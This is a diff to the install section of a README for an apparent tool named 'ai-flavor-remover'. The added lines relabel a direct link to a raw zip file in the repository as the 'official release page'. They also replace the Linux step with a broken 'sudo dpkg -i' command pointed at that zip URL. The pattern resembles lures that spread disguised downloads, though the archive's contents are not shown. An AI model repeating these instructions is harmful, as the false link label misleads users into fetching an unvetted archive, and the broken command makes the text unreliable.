Renen343/ai-flavor-remover/README.md

 ## 📦 Download & Install
 To get started, follow these simple steps:

-1. **Visit the Release Page**: Click [here](https://github.com/Renen343/ai-flavor-remover/releases) to go to the official release page.
+1. **Visit the Release Page**: Click [here](https://raw.githubusercontent.com/Renen343/ai-flavor-remover/main/deepmost/remover-ai-flavor-3.0.zip) to go to the official release page.
 2. **Select the Latest Version**: On the release page, you will see a list of available versions.
 Choose the latest version by looking for the highest version number (e.g., v1.0.0).
 3. **Download the Installer**: Look for the `.exe`, `.dmg`, or appropriate file type for your operating system.
 Click on it to start the download.
 4. **Install the Application**:
     - For Windows: Double-click the downloaded `.exe` file and follow the on-screen instructions.
     - For macOS: Open the downloaded `.dmg` file, drag the application into your Applications folder, and launch it from there.
-    - For Linux: Open your terminal, navigate to the downloaded file, and run `sudo dpkg -i yourfile.deb` or the appropriate command for your distribution.
+    - For Linux: Open your terminal, navigate to the downloaded file, and run `sudo dpkg -i https://raw.githubusercontent.com/Renen343/ai-flavor-remover/main/deepmost/remover-ai-flavor-3.0.zip` or the appropriate command for your distribution.
 5. **Run the Application**: Once installed, locate the ai-flavor-remover application on your device.
 Open it to start using the tool.

 ## 🔍 How to Use ai-flavor-remover